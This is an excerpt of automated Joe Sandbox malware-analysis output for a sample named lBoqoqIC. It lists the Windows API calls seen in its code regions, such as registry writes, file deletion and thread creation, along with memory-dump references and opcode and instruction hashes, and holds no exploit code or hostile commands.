                                                                                                                • Instruction Fuzzy Hash: B711C471100346ABD220EB64DC88FBB77ACFB84750F000A1DF96696192DB74B809CB68
                                                                                                                APIs
                                                                                                                • _strrchr.LIBCMT ref: 10002C07
                                                                                                                • GetFileAttributesA.KERNEL32(00000000,1001C030,?,00000000), ref: 10002C23
                                                                                                                • _strrchr.LIBCMT ref: 10002C35
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10002DE1
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,?,?,00000000), ref: 10002DE8
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,00000000), ref: 10002E01
                                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,00000000), ref: 10002E08
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$_strrchr$DeleteDirectoryRemove
                                                                                                                • String ID:
                                                                                                                • API String ID: 1865428942-0
                                                                                                                • Opcode ID: 5c1133e681a82aa2b1f29d2a9aba7692be0292bccdf77411fdd838d84a4b2a58
                                                                                                                • Instruction ID: a86d7072aa1f237bfd590c530da7ccd619eec75b1ba182d169b53ac92d9b8172
                                                                                                                • Opcode Fuzzy Hash: 5c1133e681a82aa2b1f29d2a9aba7692be0292bccdf77411fdd838d84a4b2a58
                                                                                                                • Instruction Fuzzy Hash: 807182B59002549AF751CF30CC80BEE73B9DF492C0F1582D9E659A728AEB30DD868755
                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 100032BC
                                                                                                                • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,1001C220,00000004), ref: 100032DA
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 100032EA
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10003306
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateValue
                                                                                                                • String ID: %Qe$6A2V
                                                                                                                • API String ID: 1009429713-165075509
                                                                                                                • Opcode ID: d1adb0a9435689ccc7e59560294434ca3c917ffc4fb148fbd8bbf58d9696b306
                                                                                                                • Instruction ID: 9701926052440edfb952f16291a651358b50205cdd9003b7f3dcacbfad8b2c73
                                                                                                                • Opcode Fuzzy Hash: d1adb0a9435689ccc7e59560294434ca3c917ffc4fb148fbd8bbf58d9696b306
                                                                                                                • Instruction Fuzzy Hash: CAD17DB4D093688BDBA4CF58D981B9DBBB6AF48314F1081D9DA0DA7361DB305B85CF06
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00479FB5
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0047A22E: __EH_prolog.LIBCMT ref: 0047A233
                                                                                                                • GetFileAttributesA.KERNEL32(?,.dat,00000000,?,00000000,0000002E,00523C88,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870), ref: 0047A17F
                                                                                                                  • Part of subcall function 004C279E: __EH_prolog.LIBCMT ref: 004C27A3
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                • GetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?), ref: 0047A072
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,00510870,00510870,00523C84,?,00000000,00514880,/DATFILE,00523A30,00510870,?,00000000,_ir_tu2_temp,?,?), ref: 0047A0CD
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesFileH_prologInterlocked$Increment$Decrementlstrlen
                                                                                                                • String ID: .dat$/DATFILE
                                                                                                                • API String ID: 2903078539-3734404335
                                                                                                                • Opcode ID: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                                                • Instruction ID: f39ebca024d9f9070bbb9e426eb7b52e45bccf392c95d3adb7dd4dc9415a9ae8
                                                                                                                • Opcode Fuzzy Hash: 422077f05ffd68f1cfd918d373ffc439308f2974d8bc47cbcf6cda247729fb8d
                                                                                                                • Instruction Fuzzy Hash: B261A078C00259DACF04EBA5C985EEEBBB4EF54308F10855EE415B3281DB786B49CB65
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040CA7B
                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,0000005C,0000005C,?,00000000,00510870), ref: 0040CACE
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CB2D
                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CB3F
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,00510870,00000002,?,00000002,?,00000000,00510870), ref: 0040CBC1
                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,00000000,00510870), ref: 0040CBD3
                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,00000000,00510870), ref: 0040CBF3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$Current$Create$H_prolog
                                                                                                                • String ID:
                                                                                                                • API String ID: 291296761-0
                                                                                                                • Opcode ID: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                                                • Instruction ID: b004479bdaab3d3bd829a467c65cd02cbc0d56440a2eb029a2dbf14c7f884d89
                                                                                                                • Opcode Fuzzy Hash: 40716f3851980a4ba98cea04baad11c2702fb2dff45ffb58a33ae0b8bd074f5f
                                                                                                                • Instruction Fuzzy Hash: 7041A935900218DBCB10EFA4D8C6BEEBB78AB10744F00467BF955E71C1D778AA85CB94
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog
                                                                                                                • String ID: Error%s (%d)$Notice%s$Skipped%s$Success%s$Warning%s (%d)
                                                                                                                • API String ID: 3519838083-3091091692
                                                                                                                • Opcode ID: f7fcb5b501ab4643951644a100e344e921a290076a31aa2af07d2169b61c595a
                                                                                                                • Instruction ID: c00101d51fd0725ddedb18ba59b7acc79d488dc364902b61f8dcc14e9708777c
                                                                                                                • Opcode Fuzzy Hash: f7fcb5b501ab4643951644a100e344e921a290076a31aa2af07d2169b61c595a
                                                                                                                • Instruction Fuzzy Hash: A6118E3690010AEBCF15DF90CC01DEE7F61FB44744B08C91BB82992290DB799A74AB5A
                                                                                                                APIs
                                                                                                                • KiUserCallbackDispatcher.NTDLL(0000000B), ref: 004CB679
                                                                                                                • GetSystemMetrics.USER32(0000000C), ref: 004CB680
                                                                                                                • GetDC.USER32(00000000), ref: 004CB699
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004CB6AA
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004CB6B2
                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004CB6BA
                                                                                                                  • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000002), ref: 004D4BED
                                                                                                                  • Part of subcall function 004D4BDB: GetSystemMetrics.USER32(00000003), ref: 004D4BF7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1031845853-0
                                                                                                                • Opcode ID: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                                                • Instruction ID: bf57f687fb48ed17a37b73ff62f3306dad246145462785bd4eea27261f4cc86b
                                                                                                                • Opcode Fuzzy Hash: 728750b86aee9f3288ab1b03eaa7706f7e1acab1d4fc09a5825885b453dbf76d
                                                                                                                • Instruction Fuzzy Hash: 42F05B356407409BE7306B729C89F17B7A4EBD0755F11442FF6014A291D7749805CFA5
                                                                                                                APIs
                                                                                                                • VariantClear.OLEAUT32(?), ref: 1000799B
                                                                                                                • VariantInit.OLEAUT32(?), ref: 10007B70
                                                                                                                • VariantClear.OLEAUT32(?), ref: 10007B9B
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 10007BAB
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$Clear$AllocInitString
                                                                                                                • String ID: p=5w
                                                                                                                • API String ID: 347172062-177745770
                                                                                                                • Opcode ID: 18d1f9bc7d60514b8c071061a647a9da248ff47cbcca3e148f92d8da5b3ecc60
                                                                                                                • Instruction ID: 3c42206e5b28316b31501cdf18cd05bef52e78a0fe20a107dde5727b69a291f3
                                                                                                                • Opcode Fuzzy Hash: 18d1f9bc7d60514b8c071061a647a9da248ff47cbcca3e148f92d8da5b3ecc60
                                                                                                                • Instruction Fuzzy Hash: 8EA16170E00219AFEB04CFA4C944FAEBBF9FF49344F118198E809AB255D775AE45CB61
                                                                                                                APIs
                                                                                                                • RegCreateKeyExA.KERNEL32(80000002,?,00000000,00000000,00000000,00020119,00000000,?,00000000,1001C030), ref: 10004FA4
                                                                                                                • RegGetValueA.KERNEL32(?,00000000,?,0000FFFF,00000000,?,00000100), ref: 100050B1
                                                                                                                • RegCloseKey.KERNEL32(?), ref: 10005174
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10005199
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$CreateValue
                                                                                                                • String ID: 6A2V
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0040FB19
                                                                                                                • GetFileAttributesA.KERNEL32(?,00523A30), ref: 0040FB45
                                                                                                                • lstrcpy.KERNEL32(?,?), ref: 0040FB5E
                                                                                                                • 752A1540.VERSION(00000000,00510870,?,?,?,?,00000000,00000000,?,?), ref: 0040FBA6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: A1540AttributesFileH_prologlstrcpy
                                                                                                                • String ID: %d.%d.%d.%d
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004087E0
                                                                                                                • LoadLibraryA.KERNEL32(00000001,0000000A), ref: 0040882F
                                                                                                                • LoadLibraryExA.KERNEL32(00000002,00000000,00000008), ref: 00408843
                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00408862
                                                                                                                • FreeLibrary.KERNEL32(00000001,?,?,?), ref: 00408A4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Library$Load$AddressFreeH_prologProc
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005170,00000000,00000000,?), ref: 10002B11
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004290,00000000,00000000,00000000), ref: 10002B31
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00004560,00000000,00000000,00000000), ref: 10002B4B
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00000060,00000000,00000000,00000000), ref: 10002B6A
                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 10002B75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateThread$ObjectSingleWait
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C93E0: GetWindowLongA.USER32(?,000000F0), ref: 004C93EC
                                                                                                                • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 004D00C5
                                                                                                                • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 004D00D9
                                                                                                                • GetDesktopWindow.USER32 ref: 004D00DD
                                                                                                                • GetWindow.USER32(00000000), ref: 004D00EA
                                                                                                                • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 004D010B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$DesktopLong
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000000,00000000,0049D320,?,?,?,0049F538,00000862), ref: 004A23F8
                                                                                                                • GetFileAttributesA.KERNEL32(?,?,?,0049F538,00000862), ref: 004A2418
                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000,?,?,0049F538,00000862), ref: 004A2427
                                                                                                                • DeleteFileA.KERNEL32(?,?,?,0049F538,00000862), ref: 004A2432
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Attributes$DeleteValue
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 0046CF11
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046CF27
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                                                  • Part of subcall function 004C932E: GetDlgItem.USER32(?,?), ref: 004C933C
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0046CF44
                                                                                                                • LoadIconA.USER32(?,00000073), ref: 0046CF6A
                                                                                                                • SendMessageA.USER32(?,00000080,00000000,00000000), ref: 0046CF7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientRect$ScreenWindow$IconItemLoadMessageSend
                                                                                                                • String ID:
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNEL32(00000040,000095B6,7556DF20,00000000,0049D7C5), ref: 0049A534
                                                                                                                • TlsSetValue.KERNEL32(0000001C,00000000), ref: 0049A547
                                                                                                                • GlobalHandle.KERNEL32(00000000), ref: 0049A55A
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0049A563
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 0049A56A
                                                                                                                  • Part of subcall function 0049A410: lstrcpy.KERNEL32(?,Extract Progress), ref: 0049A50D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmp
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocFreeHandleUnlockValuelstrcpy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074214269-0
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004252D1
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 0041F1C0: __EH_prolog.LIBCMT ref: 0041F1C5
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 0042539F
                                                                                                                • __ftol.LIBCMT ref: 004253C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked__ftol$DecrementIncrementlstrlen
                                                                                                                • String ID: 0:R
                                                                                                                • API String ID: 439246406-2078724643
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046D58C
                                                                                                                  • Part of subcall function 00473444: __EH_prolog.LIBCMT ref: 00473449
                                                                                                                  • Part of subcall function 0046D05F: __EH_prolog.LIBCMT ref: 0046D064
                                                                                                                  • Part of subcall function 00416514: __EH_prolog.LIBCMT ref: 00416519
                                                                                                                  • Part of subcall function 0047A500: __EH_prolog.LIBCMT ref: 0047A505
                                                                                                                  • Part of subcall function 0046F10B: __EH_prolog.LIBCMT ref: 0046F110
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: 0:R$C:\temp\SUF_SFX_TEST\$Unknown
                                                                                                                • API String ID: 3243491680-1928702690
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,00000000,755734C0,?,?,0049F538,00000862), ref: 0049D0DC
                                                                                                                • ReadFile.KERNEL32(?,?,00002800,?,00000000,?,?,?,?,?,?,0049F538,00000862), ref: 0049D1B4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileReadValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 2860046521-0
                                                                                                                APIs
                                                                                                                • GetVersion.KERNEL32(?,?,?,004D4BB6), ref: 004D4C32
                                                                                                                • GetProcessVersion.KERNEL32(00000000,?,?,?,004D4BB6), ref: 004D4C6F
                                                                                                                • LoadCursorA.USER32(00000000,00007F02), ref: 004D4C9D
                                                                                                                • LoadCursorA.USER32(00000000,00007F00), ref: 004D4CA8
